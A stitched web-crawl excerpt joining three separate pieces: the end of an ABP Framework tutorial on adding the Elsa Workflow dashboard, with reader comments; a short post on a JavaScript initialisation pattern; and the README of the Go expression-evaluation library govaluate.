context.ServiceProvider.GetRequiredService<IBuildsAndStartsWorkflow>(); workflowRunner.BuildAndStartWorkflowAsync<HelloWorldConsole>(); } These services required for the dashboard. We don't need to register our workflows one by one anymore. Because now we use .AddWorkflowsFrom<Startup>(), and this registers workflows on our behalf. As you may notice here, we use a section named Elsaand its sub-sections from the configuration system but we didn't define them yet. To define them open your appsettings.jsonand add the following Elsa section into this file. { //... "Elsa": { "Http": { "BaseUrl": "" } } } Define Permission For Elsa Dashboard We can define a permission to be assured of only allowed users can see the Elsa Dashboard. Open your ElsaDemoPermissionsclass under the Permissions folder (in the ElsaDemo.Application.Contractslayer) and add the following permission name. 
namespace ElsaDemo.Permissions { public static class ElsaDemoPermissions { public const string GroupName = "ElsaDemo"; public const string ElsaDashboard = GroupName + ".ElsaDashboard"; } } - After that, open your ElsaDemoPermissionDefinitionProviderclass and define the permission for Elsa Dashboard. using ElsaDemo.Localization; using Volo.Abp.Authorization.Permissions; using Volo.Abp.Localization; namespace ElsaDemo.Permissions { public class ElsaDemoPermissionDefinitionProvider : PermissionDefinitionProvider { public override void Define(IPermissionDefinitionContext context) { var myGroup = context.AddGroup(ElsaDemoPermissions.GroupName); myGroup.AddPermission(ElsaDemoPermissions.ElsaDashboard, L("Permission:ElsaDashboard")); } private static LocalizableString L(string name) { return LocalizableString.Create<ElsaDemoResource>(name); } } } - As you can notice, we've used a localized value (L("Permission:ElsaDashboard")) but haven't added this localization key and value to the localization file, so let's add this localization key and value. To do this, open your en.jsonfile under Localization/ElsaDemo folder (under the DomainShared layer) and add this localization key. { "culture": "en", "texts": { "Menu:Home": "Home", "Welcome": "Welcome", "LongWelcomeMessage": "Welcome to the application. This is a startup project based on the ABP framework. For more information, visit abp.io.", "Permission:ElsaDashboard": "Elsa Dashboard" } } Add Elsa Dashboard Component To Application - After those configurations, now we can add Elsa Dashboard to our application with an authorization check. To do this, create a razor page named _Host.cshtml (under Pages folder) and update its content as below. @page "/elsa" @using ElsaDemo.Permissions @using Microsoft.AspNetCore.Authorization @attribute [Authorize(ElsaDemoPermissions.ElsaDashboard)] @{ var serverUrl = $"{Request.Scheme}://{Request.Host}"; Layout = null; } <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <title>Elsa Workflows</title> <link rel="icon" type="image/png" sizes="32x32" href="/_content/Elsa.Designer.Components.Web/elsa-workflows-studio/assets/images/favicon-32x32.png"> <link rel="icon" type="image/png" sizes="16x16" href="/_content/Elsa.Designer.Components.Web/elsa-workflows-studio/assets/images/favicon-16x16.png"> <link rel="stylesheet" href="/_content/Elsa.Designer.Components.Web/elsa-workflows-studio/assets/fonts/inter/inter.css"> <link rel="stylesheet" href="/_content/Elsa.Designer.Components.Web/elsa-workflows-studio/elsa-workflows-studio.css"> <script src="/_content/Elsa.Designer.Components.Web/monaco-editor/min/vs/loader.js"></script> <script type="module" src="/_content/Elsa.Designer.Components.Web/elsa-workflows-studio/elsa-workflows-studio.esm.js"></script> </head> <body class="h-screen" style="background-size: 30px 30px; background-image: url(/_content/Elsa.Designer.Components.Web/elsa-workflows-studio/assets/images/tile.png); background-color: #FBFBFB;"> <elsa-studio-root <elsa-studio-dashboard></elsa-studio-dashboard> </elsa-studio-root> </body> </html> - We've defined an attribute for authorization check here. With this authorization check, only the user who has the Elsa Dashboard permission allowed to see this page. Add Elsa Dashboard Page To Main Menu - We can open the ElsaDemoMenuContributorclass under the Menus folder and define the menu item for reaching the Elsa Dashboard easily. 
using System.Threading.Tasks; using ElsaDemo.Localization; using ElsaDemo.MultiTenancy; using ElsaDemo.Permissions; using Volo.Abp.Identity.Web.Navigation; using Volo.Abp.SettingManagement.Web.Navigation; using Volo.Abp.TenantManagement.Web.Navigation; using Volo.Abp.UI.Navigation; namespace ElsaDemo.Web.Menus { public class ElsaDemoMenuContributor : IMenuContributor { public async Task ConfigureMenuAsync(MenuConfigurationContext context) { if (context.Menu.Name == StandardMenus.Main) { await ConfigureMainMenuAsync(context); } } private async Task ConfigureMainMenuAsync(MenuConfigurationContext context) { var administration = context.Menu.GetAdministration(); var l = context.GetLocalizer<ElsaDemoResource>(); context.Menu.Items.Insert( 0, new ApplicationMenuItem( ElsaDemoMenus.Home, l["Menu:Home"], "~/", icon: "fas fa-home", order: 0 ) ); //add Workflow menu-item context.Menu.Items.Insert( 1, new ApplicationMenuItem( ElsaDemoMenus.Home, "Workflow", "~/elsa", icon: "fas fa-code-branch", order: 1, requiredPermissionName: ElsaDemoPermissions.ElsaDashboard ) ); //... } } } - With that menu item configuration, only the user who has Elsa Dashboard permission allowed to see the defined menu item. Result - Let's run the application and see how it looks like. If the account you are logged in has the ElsaDemoPermissions.ElsaDashboard permission, you should see the Workflow menu item. If you do not see this menu item, please be assured that your logged-in account has that permission. - Now we can click the "Workflow" menu item, display the Elsa Dashboard and designing workflows. the same to you !! How to resolved ,I have tried to run elsa demo in github ,but it still so tolo 8/25/2021 8:13:07 AM Great! How to replace ElsaContext with AbpDbContext?Any good ideas? MaxRiz 7/29/2021 3:46:22 PM Great! Thanks! I was looking for a good workflow solution with abp viswajwalith 7/2/2021 5:10:50 PM We are trying to integrate elsa dashboard, it worked perfectly in Application template, but when we try to integrate in microservice based ABP solution getting following error when accessing the elsa dashboard. TypeLoadException: Could not load type 'System.Web.Security.MembershipPasswordAttribute' from assembly 'System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a'. viswajwalith 6/30/2021 8:42:08 AM Thanks for the article. We implemented this in our ABP application. We can able to create workflow but when we modify workflow, we are facing error. Error: ArgumentException: A different value already has the Id '6'. Newtonsoft.Json.Utilities.BidirectionalDictionary<TFirst, TSecond>.Set(TFirst first, TSecond second) Could you provide a way to solve the error. Engincan VESKE 6/30/2021 10:31:48 AM Hi @viswajwalith, I think this is related to the Elsa Core library because there are several issues (e.g.) in the Elsa repository like you're facing. I've encountered this problem as well. I wasn't using it in production so I deleted the workflow and create the new one by exporting the previous workflow's JSON file via the designer. Vivek Koppula 6/26/2021 10:24:11 AM Thanks for the article. If you want the final elsa dashboard to be within the layout of abp, try removing the line Layout = null; from _Host.cshtml file. My _Host.cshtml file now looks like as follows. 
@page "elsa/workflows" @using AbpAppTmpltMvcPvt.Permissions @using Microsoft.AspNetCore.Authorization @attribute [Authorize(AbpAppTmpltMvcPvtPermissions.ElsaDashboard)] @{ var serverUrl = $"{Request.Scheme}://{Request.Host}"; //Layout = null; } .... Engincan VESKE 6/30/2021 10:33:19 AM Thanks, Vivek. Henry Chan 6/23/2021 7:56:38 AM Could you provide a way to add ABP's Authorization to the Elsa API Server ? Thanks. xx xx 6/23/2021 2:58:58 AM Thank you. but I could not understand how to use the workflow in a real world,such as apply a job request, Engincan VESKE 6/23/2021 6:24:00 AM Hi, thanks for the feedback. In this article, I just wanted to basically introduce the Elsa Workflow library and show how we can integrate the Elsa Dashboard into our ABP-based application. I may write another article about a real-time scenario in the future. You can check the Elsa Core's documentation for a real-time application, like document-approval (). behzad 6/22/2021 12:09:33 PM THIS IS AWESOME! THANK YOU Engincan VESKE 6/22/2021 12:15:15 PM Thank you. Serdar 6/22/2021 10:03:11 AM very good article. thanks. Engincan VESKE 6/22/2021 10:18:23 AM Thank you.
https://community.abp.io/articles/using-elsa-workflow-with-the-abp-framework-773siqi9
CC-MAIN-2022-05
en
refinedweb
Javascript function pattern

We all know the problem: lots of JavaScript functions and a polluted global namespace. To manage this I have built a pattern for anonymous functions as variables to use client side in an application. The basic requirement is that it is easy to stack the functions for initialisation calls, and that the functions within this function are effectively namespace-protected from each other.

I am assuming you are familiar with the basic use of an anonymous function as the value of a variable:

var functionName = (() => {
})();

To this we add some initialisation management:

var functionName = (() => {
    let initDone = false;
    let loadPrevious;
    let init = () => {
        if (!initDone) {
            initDone = true;
            …
            if (functionName.loadPrevious) functionName.loadPrevious();
        }
    };

Add a return to the function to expose internal variables:

    return {init: init, loadPrevious: loadPrevious};
})();

And after the function definition:

functionName.loadPrevious = window.onload;
window.onload = functionName.init;

Replace the … with anything that needs to be done to initialise. Any asynchronous calls should have a callback function. You can sort of get some callback hell from this, but there are ways to manage that (not the subject of this). Calling loadPrevious should be inside a callback function if you have async calls. Of course other functions can be defined (as variables to avoid hoisting) within the function and exposed using the return value. This simple and effective pattern has allowed us to build an extensive managed functional programming environment.
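Putting the fragments together, a complete, self-contained version of the pattern looks like this. The module name and the console.log initialisation work are placeholders for illustration, and it assumes a browser environment where window.onload exists.

var pageSetup = (() => {
    let initDone = false;
    let loadPrevious;

    let init = () => {
        if (!initDone) {
            initDone = true;
            // ... whatever this module needs to do at start-up ...
            console.log('pageSetup initialised');
            // Chain into whichever onload handler was registered before us.
            if (pageSetup.loadPrevious) pageSetup.loadPrevious();
        }
    };

    return { init: init, loadPrevious: loadPrevious };
})();

// Remember the previous handler, then take over window.onload.
pageSetup.loadPrevious = window.onload;
window.onload = pageSetup.init;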
https://medium.com/@rickmarshall_57431/javascript-function-pattern-78dce6d2786
CC-MAIN-2022-05
en
refinedweb
Building a Python monorepo for fast, reliable development Suman Karumuri | Pinterest technical lead, Visibility & Ruth Grace Wong | Pinterest engineer, Core Site Reliability More than 200 million people discover and do what they love on Pinterest every month. We rely on several hundred Python services and tools to power these experiences. The code for these services lives in 100+ Git repositories (except for our Python frontend monolith). Overtime, we found that developing Python applications across a growing number of repos was causing friction and slowing down our developers. We built Python commons to provide a seamless experience for our Python developers. In this post, we’ll share a few challenges we encountered managing Python code at scale, and how Python commons provides a fast and reliable code development environment. Challenges managing Python code at scale While Python tools work great for managing code in a single repo, the tools aren’t designed for managing code across repos. Even in a single repo, there’s a steep learning curve to correctly set up and use tools and utilities, like requirements, setup.py and tox for a reproducible build and test environment. Given the complexity involved, few developers take the time to do it right. Below, we’ll explain a few issues our developers face when building, testing and deploying Python code across 100+ repos. Managing virtual environments: Each Python project has its own virtualenv, and the developer needs to be mindful of using the correct virtualenv while working in a project and branch. Using the wrong virtualenv leads to hard-to-trace errors in the development, build and deploy process. Running unit tests with tox: For test integrity, developers are advised to run their tests in a virtualenv using tox. Given the complexity of managing virtual envs and setting up tox correctly, few projects do this in practice. (Some developers skip writing unit tests entirely.) Package pinning: If packages aren’t pinned to specific versions they might break in production when their dependencies are upgraded. Even if each repo pinned the version of their packages, reusing code across repos leads to conflicting package versions and breaks the package during deployment. Deploying security fixes: Upgrading packages to fix a security issue across hundreds of repos is a hard, boring and tedious process. Pip install: Most of our developers deploy Python packages using pip install. In practice, we found pip install isn’t a robust deployment mechanism for the following reasons: - Pip install isn’t atomic. A failed pip install may leave some packages upgraded and others an old version. This occasionally causes deployment outages. - Pip can fail silently on production machines which leads to production outages. - Pip’s command line options are inconsistent across minor version changes, which can cause a pip install to fail when pip is upgraded along with new OS versions. - Pip downloads each dependency recursively. While this is harmless at small scale, doing it across tens of thousands of machines several times every day is inefficient. - Pip install wasn’t ideal for deploying internal tools because inconsistent dev environments was becoming hard to support. Most tools came with custom scripts that setup virtual envs and deployed the tool there. While this worked, it was a tedious and error-prone process. 
Consistent development environment: Since developers set up their own repo, over time there’s little consistency in development, build, test and deployment setups. Several projects didn’t have continuous integration setup for their build process while coding conventions and quality varied across repos. Even minor issues, like failing to correctly namespace a package, led to namespace clobbering issues when the code was reused resulting in complicated workarounds. This additional complexity discouraged code reuse across the repos. Our takeaway is the standard Python toolchain needs a lot of work upfront to create a consistent and reproducible build environment in a single repo. Even if we set up the tooling carefully, the standard tools can’t ensure a consistent build and deploy pipeline across repos. Python commons We had one primary goal as we designed our new solution — we wanted it to be easy to do the right thing while enabling developers to quickly ship code. So we built a monorepo called Python Commons using Pants build tool. To streamline our release process, we use a Python EXecutable(PEX) file as our release primitive. Python commons monorepo The first decision was to start using a monorepo for all our tool’s code. This provides a single place for all code and allows us to enforce healthy development practices over a multi-repo solution. A consistent development, build and test environment also encourages modular code and code reuse. A monorepo is a more natural workflow for us since we have several language-specific monorepos, and it’s common for several tools share the same repo. Since we already have a Python monorepo for our frontend application code, our first instinct was to move the tool’s code into that repo to create a single repo for all Python code. However, that didn’t work, because the development workflow was heavily customized for building our monolithic Python web frontend. So, we decided to build a separate monorepo called “Python commons” for our tools and services. Pants While deciding on the monorepo was easy, the hard part was setting up a development workflow suitable for a wide-range of Python applications, from web apps to services, libraries and command line tools. To make managing and using the monorepo easier, we use Pants as our build tool. Pants helps enforce a uniform development workflow for building, testing and packaging apps while keeping our configuration DRY. The code layout we used in the repo provides a consistent development workflow for every project in the repo. - The folder structure shown in Figure 1 ensures source and tests are separated, and all internal code is in the Pinterest namespace. This separation safeguards us from shipping tests or their dependencies into production. - Pants comes with a built-in Python linter that enforces code style for the repo. - Standard build targets provide an intuitive and consistent development workflow to build, test, run and release packages (as shown in Figure 4). - The pants repl option provides an interactive repl to play with the code. - Pants creates a virtualenv for every run based on the dependencies in the BUILD file. If the dependencies change between Git branches, developers don’t have to switch virtualenvs to make sure their code works correctly making virtual env management seamless. - Since tests are run in a virtualenv, developers don’t have to learn or use tox. - Pants test target automatically creates a test runner, so there’s no need for a separate script to run tests. 
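To make those standard build targets concrete, a BUILD file for a small tool in such a repo might look roughly like the sketch below. The paths, target names and dependencies are invented, and the target types are the Pants v1 Python backend ones (python_library, python_binary, python_tests), not necessarily the exact definitions used at Pinterest.

# src/python/pinterest/example_tool/BUILD  (hypothetical layout)

python_library(
    name='example_tool_lib',
    sources=globs('*.py'),
    dependencies=[
        '3rdparty/python:requests',            # pinned centrally for the whole repo
        'src/python/pinterest/common:logging', # internal code reused across projects
    ],
)

python_binary(
    name='example_tool',
    source='main.py',
    dependencies=[':example_tool_lib'],
)

python_tests(
    name='tests',
    sources=globs('tests/*.py'),
    dependencies=[':example_tool_lib'],
)

With a file like that in place, ./pants test src/python/pinterest/example_tool:tests runs the tests in their own virtualenv, and ./pants binary src/python/pinterest/example_tool:example_tool produces a self-contained PEX.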
Pants simplifies dependency management across projects using repo and version pinning. - Pants controls which external repos we download our packages from. When our access to PyPi repo was blocked, we pointed the repo to an internal mirror with a one line configuration change to the pants.ini file. - We use the same set of pinned dependencies for the entire repo (as shown in Figure 2). This is the only place in the repo for defining our external dependencies and simplifies our dependency management. Pants builds a virtual environment for every build, so any dependency conflicts are detected right away. - A single place for pinned dependencies allows us to upgrade the package for all the projects in the repo at once. This greatly simplifies doing security audits and package version upgrades. By enabling fast reproducible builds, Pants simplifies build and release management. - Pants run target in a BUILD file can be used for running the program locally, eliminating the need for scripts. - Pants provides fast, reproducible builds for our packages. Pants performs incremental builds on its targets, so only changed modules are rebuilt which speeds up the build process. Running all the build targets in a virtual envs ensures builds are reproducible. - Pants python_library target can include a setup.py definition (as shown in Figure 3). By using this target, developers don’t have to learn setup.py to publish Python eggs. - Pants binary target generates a standalone pex binary for the project. PEX A monorepo with pants streamlined our development and test process. We observed our developers preferred their own repos, because it offers them control over the distribution of their code as a Debian package, Docker container, Python egg or script. To cater to these use cases and streamline our package release and deployment process, we needed a mechanism to easily export packages into various formats. Exporting an egg was easy since Pants natively supports it. To package our code into other formats, we used PEX as a basic packaging primitive for our code. A PEX is a self-contained, cross-platform, Python executable format with packaged dependencies, so it only needs a Python interpreter on the machine it’s running on. A PEX can be packaged into a Debian package, Docker container or uploaded to S3. The last deployment option is great for shipping internal tools, which are hardest to deploy and manage. Our multi-format package release process is powered by a Jenkins script (as shown in Figure 5). It uses the project name and release type to generate the necessary files (Dockerfile, Debian package, Python egg, PEX binary) and makes the build available for deploy by uploading them to their respective repos. The release process not only relieves our developers of understanding Docker, Debian package management or Python egg format, but it also enforces best hygienic and secure package management practices. Conclusion Using this development setup we take care of all the boilerplate code a developer writes before working on a project. This helps our developers focus on code without having to worry about setup.py, tox, virtualenv. It also eliminates the need to create scripts to setup and run the project locally, scripts to release a Docker or Debian packages or scripts to test code locally or in Jenkins. We rolled out Python commons almost a year ago and have already migrated 35 projects to it. 
Acknowledgements: We’d like to thank Evan Jones, Yongwen Xu and Nick Zheng for their help and feedback on the project. We’d also like to thank the pants community for their support.
https://medium.com/pinterest-engineering/building-a-python-monorepo-for-fast-reliable-development-be763781f67?source=rss-ef81ef829bcb------2
CC-MAIN-2022-05
en
refinedweb
Hi again! Right now I'm trying to make an endless tunnel. I have say about 5 prefabs stuck together to make a tunnel at the beginning of the level, for a start. When you get close to the end of this pre-done set of tunnels, I want it to create say 5 or 10 more after those. (They're on the Z axis) I've been messing around with the various Instantiate functions, and I know that's what I need to do but it's just not working the way I want it to. I was using the first Instantiate script from Unity's Instantiate scripting page and it's almost exactly what I want. It creates them and I can specify how many, and how spaced apart they are on what axis. Got all that working, set up a timer to make it only instantiate 10 every 10 seconds, but the problem is, it's creating the same 10 over each other every time. It doesn't know that I want them created further along the Z axis, from the last batch. Is there an easy way to do this? Still not a whiz at scripting so any help would be appreciated. Thanks! :) EDIT: My current script: var prefab : Transform; private var CreateTimer = 10.0; private var NextCreate = 0.0; function Update() { if(Time.time > CreateTimer + NextCreate) { NextCreate = Time.time; for (var i : int = 0;i < 10; i++) { Instantiate (prefab, Vector3(0, 0, i * 47.87), Quaternion.identity); } } } Answer by ByteSheep · Apr 21, 2012 at 10:34 PM If I understand correctly, then this should do the trick: var prefab : Transform; private var CreateTimer = 10.0; private var NextCreate = 0.0; private var count = 0; function Update() { if(Time.time > CreateTimer + NextCreate) { NextCreate = Time.time; for (var i : int = 0;i < 10; i++) { count++; Instantiate (prefab, Vector3(0, 0, count * 47.87), Quaternion.identity); } } } Basically you need a variable that won't be reset each time the ten pieces have been created.. Hope this helps ;) EDIT: Here's a slightly cleaner version using coroutines (untested). var prefab : GameObject; var segmentPrefabCount = 10; var pieceLength = 20.0f; var startPositionOffset = Vector3(0, 0, 0); private var pieceNumber = 0; function Start() { // Create a new segment every 10 seconds InvokeRepeating ("CreateSegment", 10f, 10f); } function CreateSegment() { // Create a segment with segmentPrefabCount amount of prefabs for (var i = 0; i < segmentPrefabCount; i++) { CreatePiece(); } } function CreatePiece() { // Position for this piece will be the startPositionOffset plus the length of a prefab times it's index // Change Vector3.forward to whichever direction you need (e.g. -Vector3.up) var segmentPosition = startPositionOffset + Vector3.forward * (pieceNumber * pieceLength); Instantiate (prefab, segmentPosition, Quaternion.identity); pieceNumber++; } That works perfectly! I knew it was simple, thank you so much. :) Glad to see you got it working. Hello, I'm really new at scripting and to Unity itself. Doing some research to work on a game similar to this tunnel effect that looks like as if a character is falling through a hole. I'd like to ask how does the NextCreate help with this situation because I'm stuck at understanding that part. And also why the value of 47.87? Hopefully someone turns up to answer because this is an old thread. :) Edited my answer with a script that uses coroutines ins$$anonymous$$d of Time. Also added a couple comments to hopefully make it more clear what each line is doing. Answer by Atrius · Apr 21, 2012 at 10:08 PM You need to instantiate the prefab as a GameObject and then translate its position to move it. 
Without seeing your existing script I can't help modify yours. Here's a C# script I just wrote up, there could be syntax issues as I didn't actually compile this, but I hope it gives you an idea.

public class TunnelGenerator : MonoBehaviour
{
    int segmentNumber = 0;
    float segmentLength = 15.0f;

    void CreateSegment()
    {
        // Increment what segment number you are on
        segmentNumber++;
        // Create a vector with your X,Y static and your Z the length of the prefab times the number of segments
        Vector3 pos = new Vector3(0.0f, 0.0f, segmentLength * segmentNumber);
        // Instantiate it
        GameObject segment = (GameObject)Instantiate(Resources.Load("TunnelPiece"));
        // Move it into place
        segment.transform.Translate(pos, Space.World);
    }
}

Yeah, I'm not too good with C#. I learned Java/UnityScript. That script makes some sense, though. And it does have some errors but I get the gist of things. Still not exactly sure how I should input my own values into that, though. I edited my question with the current script I was using if you want to take a look at it. I'll figure it out eventually, so you don't have to stress yourself with this. :)

Also, I worked things out and the one error I get from your script is this:

Assets/Scripts/InstantiateC.cs(14,26): error CS1061: Type `UnityEngine.Transform' does not contain a definition for `translate' and no extension method `translate' of type `UnityEngine.Transform' could be found (are you missing a using directive or an assembly reference?)

I would like to see how yours works ingame and I can probably convert it and tweak it.

I believe the root cause of the issue is Translate is capitalized. I adapted this from memory off a system I had used, but for mine I was storing a reference to each piece. Your code is much cleaner assuming you don't need the reference and just need it loaded in the scene.
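For reference, a consolidated C# version of the idea from both answers — keep a running piece counter and spawn each new piece one prefab-length further along Z — could look like the sketch below. The field names are illustrative, and the 47.87 value is simply the length of the tunnel prefab used in the question.

using UnityEngine;

public class TunnelGenerator : MonoBehaviour
{
    public GameObject tunnelPrefab;       // assign the tunnel piece prefab in the Inspector
    public float pieceLength = 47.87f;    // length of one prefab along Z
    public int piecesPerBatch = 10;
    public float secondsBetweenBatches = 10f;

    private int piecesSpawned = 0;

    void Start()
    {
        // Spawn a batch immediately, then another one every secondsBetweenBatches seconds.
        InvokeRepeating("SpawnBatch", 0f, secondsBetweenBatches);
    }

    void SpawnBatch()
    {
        for (int i = 0; i < piecesPerBatch; i++)
        {
            // piecesSpawned is never reset, so every batch continues further down the tunnel.
            Vector3 position = new Vector3(0f, 0f, piecesSpawned * pieceLength);
            Instantiate(tunnelPrefab, position, Quaternion.identity);
            piecesSpawned++;
        }
    }
}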
https://answers.unity.com/questions/243058/making-an-endless-tunnel.html?sort=oldest
CC-MAIN-2022-05
en
refinedweb
README ¶ govaluate Provides support for evaluating arbitrary C-like artithmetic/string expressions. Why can't you just write these expressions in code?. A lot of people wind up writing their own half-baked style of evaluation language that fits their needs, but isn't complete. Or they wind up baking the expression into the actual executable, even if they know it's subject to change. These strategies may work, but they take time to implement, time for users to learn, and induce technical debt as requirements change. This library is meant to cover all the normal C-like expressions, so that you don't have to reinvent one of the oldest wheels on a computer. How do I use it? You create a new EvaluableExpression, then call "Evaluate" on it. expression, err := govaluate.NewEvaluableExpression("10 > 0"); result, err := expression.Evaluate(nil); // result is now set to "true", the bool value. Cool, but how about with parameters? expression, err := govaluate.NewEvaluableExpression("foo > 0"); parameters := make(map[string]interface{}, 8) parameters["foo"] = -1; result, err := expression.Evaluate(parameters); // result is now set to "false", the bool value. That's cool, but we can almost certainly have done all that in code. What about a complex use case that involves some math? expression, err := govaluate.NewEvaluableExpression("(requests_made * requests_succeeded / 100) >= 90"); parameters := make(map[string]interface{}, 8) parameters["requests_made"] = 100; parameters["requests_succeeded"] = 80; result, err := expression.Evaluate(parameters); // result is now set to "false", the bool value. Or maybe you want to check the status of an alive check ("smoketest") page, which will be a string? expression, err := govaluate.NewEvaluableExpression("http_response_body == 'service is ok'"); parameters := make(map[string]interface{}, 8) parameters["http_response_body"] = "service is ok"; result, err := expression.Evaluate(parameters); // result is now set to "true", the bool value. These examples have all returned boolean values, but it's equally possible to return numeric ones. expression, err := govaluate.NewEvaluableExpression("(mem_used / total_mem) * 100"); parameters := make(map[string]interface{}, 8) parameters["total_mem"] = 1024; parameters["mem_used"] = 512; result, err := expression.Evaluate(parameters); // result is now set to "50.0", the float64 value. You can also do date parsing, though the formats are somewhat limited. Stick to RF3339, ISO8061, unix date, or ruby date formats. If you're having trouble getting a date string to parse, check the list of formats actually used: parsing.go:248. expression, err := govaluate.NewEvaluableExpression("'2014-01-02' > '2014-01-01 23:59:59'"); result, err := expression.Evaluate(nil); // result is now set to true Expressions are parsed once, and can be re-used multiple times. Parsing is the compute-intensive phase of the process, so if you intend to use the same expression with different parameters, just parse it once. Like so; expression, err := govaluate.NewEvaluableExpression("response_time <= 100"); parameters := make(map[string]interface{}, 8) for { parameters["response_time"] = pingSomething(); result, err := expression.Evaluate(parameters) } The normal C-standard order of operators is respected. When writing an expression, be sure that you either order the operators correctly, or use parenthesis to clarify which portions of an expression should be run first. 
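Putting the snippets above into one complete program looks like this; the parameter values are arbitrary and error handling is kept minimal.

package main

import (
	"fmt"

	"github.com/Knetic/govaluate"
)

func main() {
	// Parse once, then evaluate the same expression with different parameters.
	expression, err := govaluate.NewEvaluableExpression("(mem_used / total_mem) * 100 >= 90")
	if err != nil {
		panic(err)
	}

	for _, used := range []float64{512, 980} {
		parameters := map[string]interface{}{
			"total_mem": 1024.0,
			"mem_used":  used,
		}

		result, err := expression.Evaluate(parameters)
		if err != nil {
			panic(err)
		}
		fmt.Println(used, "->", result) // 512 -> false, 980 -> true
	}
}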
Escaping characters Sometimes you'll have parameters that have spaces, slashes, pluses, ampersands or some other character that this library interprets as something special. For example, the following expression will not act as one might expect: "response-time < 100" As written, the library will parse it as "[response] minus [time] is less than 100". In reality, "response-time" is meant to be one variable that just happens to have a dash in it. There are two ways to work around this. First, you can escape the entire parameter name: "[response-time] < 100" Or you can use backslashes to escape only the minus sign. "response\\-time < 100" Backslashes can be used anywhere in an expression to escape the very next character. Square bracketed parameter names can be used instead of plain parameter names at any time. Functions You may have cases where you want to call a function on a parameter during execution of the expression. Perhaps you want to aggregate some set of data, but don't know the exact aggregation you want to use until you're writing the expression itself. Or maybe you have a mathematical operation you want to perform, for which there is no operator; like log or tan or sqrt. For cases like this, you can provide a map of functions to NewEvaluableExpressionWithFunctions, which will then be able to use them during execution. For instance; functions := map[string]govaluate.ExpressionFunction { "strlen": func(args ...interface{}) (interface{}, error) { length := len(args[0].(string)) return (float64)(length), nil }, } expString := "strlen('someReallyLongInputString') <= 16" expression, _ := govaluate.NewEvaluableExpressionWithFunctions(expString, functions) result, _ := expression.Evaluate(nil) // result is now "false", the boolean value Functions can accept any number of arguments, correctly handles nested functions, and arguments can be of any type (even if none of this library's operators support evaluation of that type). For instance, each of these usages of functions in an expression are valid (assuming that the appropriate functions and parameters are given): "sqrt(x1 ** y1, x2 ** y2)" "max(someValue, abs(anotherValue), 10 * lastValue)" Functions cannot be passed as parameters, they must be known at the time when the expression is parsed, and are unchangeable after parsing. What operators and types does this support? -: ?? See MANUAL.md for exacting details on what types each operator supports. Types Some operators don't make sense when used with some types. For instance, what does it mean to get the modulo of a string? What happens if you check to see if two numbers are logically AND'ed together? Everyone has a different intuition about the answers to these questions. To prevent confusion, this library will refuse to operate upon types for which there is not an unambiguous meaning for the operation. See MANUAL.md for details about what operators are valid for which types. Benchmarks If you're concerned about the overhead of this library, a good range of benchmarks are built into this repo. You can run them with go test -bench=.. The library is built with an eye towards being quick, but has not been aggressively profiled and optimized. For most applications, though, it is completely fine. For a very rough idea of performance, here are the results output from a benchmark run on a 3rd-gen Macbook Pro (Linux Mint 17.1). 
BenchmarkSingleParse-12 1000000 1382 ns/op BenchmarkSimpleParse-12 200000 10771 ns/op BenchmarkFullParse-12 30000 49383 ns/op BenchmarkEvaluationSingle-12 50000000 30.1 ns/op BenchmarkEvaluationNumericLiteral-12 10000000 119 ns/op BenchmarkEvaluationLiteralModifiers-12 10000000 236 ns/op BenchmarkEvaluationParameters-12 5000000 260 ns/op BenchmarkEvaluationParametersModifiers-12 3000000 547 ns/op BenchmarkComplexExpression-12 2000000 963 ns/op BenchmarkRegexExpression-12 100000 20357 ns/op BenchmarkConstantRegexExpression-12 1000000 1392 ns/op ok API Breaks While this library has very few cases which will ever result in an API break, it can (and has) happened. If you are using this in production, vendor the commit you've tested against, or use gopkg.in to redirect your import (e.g., import "gopkg.in/Knetic/govaluate.v2"). Master branch (while infrequent) may at some point contain API breaking changes, and the author will have no way to communicate these to downstreams, other than creating a new major release. Releases will explicitly state when an API break happens, and if they do not specify an API break it should be safe to upgrade. License This project is licensed under the MIT general use license. You're free to integrate, fork, and play with this code as you feel fit without consulting the author, as long as you provide proper credit to the author in your works. Documentation ¶ Index ¶ - Variables - type EvaluableExpression - func NewEvaluableExpression(expression string) (*EvaluableExpression, error) - func NewEvaluableExpressionFromTokens(tokens []ExpressionToken) (*EvaluableExpression, error) - func NewEvaluableExpressionWithFunctions(expression string, functions map[string]ExpressionFunction) (*EvaluableExpression, error) - func (this EvaluableExpression) Eval(parameters Parameters) (interface{}, error) - func (this EvaluableExpression) Evaluate(parameters map[string]interface{}) (interface{}, error) - func (this EvaluableExpression) String() string - func (this EvaluableExpression) ToSQLQuery() (string, error) - func (this EvaluableExpression) Tokens() []ExpressionToken - func (this EvaluableExpression) Vars() []string - type ExpressionFunction - type ExpressionToken - type MapParameters - - type OperatorSymbol - - type Parameters - type TokenKind - Constants ¶ This section is empty. Variables ¶ var DUMMY_PARAMETERS = MapParameters(map[string]interface{}{}) Functions ¶ This section is empty. Types ¶ type EvaluableExpression ¶ type EvaluableExpression struct { /* Represents the query format used to output dates. Typically only used when creating SQL or Mongo queries from an expression. Defaults to the complete ISO8601 format, including nanoseconds. */ QueryDateFormat string /* Whether or not to safely check types when evaluating. If true, this library will return error messages when invalid types are used. If false, the library will panic when operators encounter types they can't use. This is exclusively for users who need to squeeze every ounce of speed out of the library as they can, and you should only set this to false if you know exactly what you're doing. */ ChecksTypes bool // contains filtered or unexported fields } EvaluableExpression represents a set of ExpressionTokens which, taken together, are an expression that can be evaluated down into a single value. func NewEvaluableExpression ¶ func NewEvaluableExpression(expression string) (*EvaluableExpression, error) Parses a new EvaluableExpression from the given [expression] string. 
